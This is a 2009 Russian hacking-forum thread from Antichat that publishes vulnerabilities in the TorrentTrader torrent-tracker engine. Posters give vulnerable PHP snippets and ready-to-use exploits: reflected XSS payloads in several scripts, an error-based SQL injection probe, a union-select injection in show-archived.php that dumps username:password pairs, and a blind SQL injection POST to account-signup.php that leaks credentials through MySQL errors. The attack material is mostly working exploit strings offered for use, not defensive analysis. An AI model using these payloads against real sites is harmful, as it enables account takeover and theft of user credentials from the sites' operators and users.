ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
Перезагрузить страницу Трекер-движок TorrentTrader
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Трекер-движок TorrentTrader
  #1  
Старый 12.08.2009, 17:31
Аватар для HAXTA4OK
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию Трекер-движок TorrentTrader
Офф сайт = http://www.torrenttrader.org/

версия TorrentTrader Classic v1.09

XSS
получается из за не достаточной обработки данных

Код:
print("<p>" . SORT_BY . " <a href=" . $_SERVER[PHP_SELF] . "?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=votes>" . VOTES . "</a>, <a href=". $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=request>Request Name</a>, or <a href=" . $_SERVER[PHP_SELF] ."?category=" . $_GET[category] . "&filter=" . $_GET[filter] . "&sort=added>" . DATE_ADDED . "</a>.</p>");
viewrequests.php?category=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E

viewrequests.php?category=&filter=%3E%3Cscript%3Ea lert(/Hi/)%3C/script%3E&sort=votes


версия TorrentTrader Classic v2.04

XSS

torrents.php?parent_cat=%3E%3Cscript%3Ealert(/Hi/)%3C/script%3E



p.S по структуре файлов похож на TBDev
Последний раз редактировалось HAXTA4OK; 12.08.2009 в 20:42..
 
Ответить с цитированием

  #2  
Старый 14.11.2009, 03:06
Аватар для [underwater]
[underwater]
Познающий
Регистрация: 29.03.2009
Сообщений: 87
Провел на форуме:
2185909

Репутация: 308
По умолчанию
Открываем файл torrents-details.php :
Код:
//speed mod
$resSpeed = mysql_query("SELECT seeders,leechers FROM torrents
WHERE $where visible='yes' and id = $id ORDER BY added DESC LIMIT 15")
or sqlerr(__FILE__, __LINE__);

Код:
http://localhost/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>1,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Нормально выводит страницу

Код:
http://localhost/torrents-details.php?id=1&
where=1=IF(LENGTH(@@version)>50,1,(SELECT+1+UNION+ALL+SELECT+1))--+
Цитата:
"MYSQL Error has occurred!"

Пассивки везде:

Код:
http://localhost/themes/default/footer.php?ttversion=<script>alert(123);</script>
http://localhost/themes/default/header.php?SITENAME="><script>alert(123);</script>
http://localhost/themes/default/header.php?CURUSER[username]=<script>alert(123);</script>
http://localhost/visitorstoday.php?todayactive=<script>alert(123);</script>
 
Ответить с цитированием

  #3  
Старый 15.12.2009, 13:57
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию
TorrentTrader Classic 1.09
Version : 1.09

SQL Injection

Vuln file: show-archived.php [str:23]
PHP код:
$query 'SELECT title, user, date, text FROM news WHERE id=\'' $_GET['id'] . '\'';
$resu mysql_query($query) or die(mysql_error()); 
Exploit:
if magic_quotes = OFF
Код:
http://[host]/[path]/show-archived.php?id=1'+union+select+null,null,null,concat_ws(0x3a,username,password)+from+users+--+
Blind SQL Injection

Vuln file: account-signup.php [str:73]
PHP код:
  $a = (@mysql_fetch_row(@mysql_query("select count(*) from users where username='$wantusername'"))) or die(mysql_error()); 
Если версия MySQL=>5.0.12 и magic_quotes = OFF, можно получить данные из ошибки Duplicate column name
Exploit:
Код:
POST http://[host]/[path]/account-signup.php HTTP/1.0
Content-type: application/x-www-form-urlencoded

wantusername=xek' and (select * from (select * from (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1)a)b join (select name_const((select concat_ws(0x3a,username,password) from users limit 0,1),1))c)d)/*
--------------------------------------------------------------
Другие уязвимости этого трэкера
http://www.milw0rm.com/exploits/8958
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
eQuestEngine - движок для создания квестов eLWAux Квесты 30 30.09.2009 01:18
Продам движок крупного трекера + база ихняя! YouSeeBeter Разное - Покупка, продажа, обмен 3 03.07.2009 15:26
Помогите определить движок видео-хостинга cow PHP, PERL, MySQL, JavaScript 5 01.07.2009 23:38



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ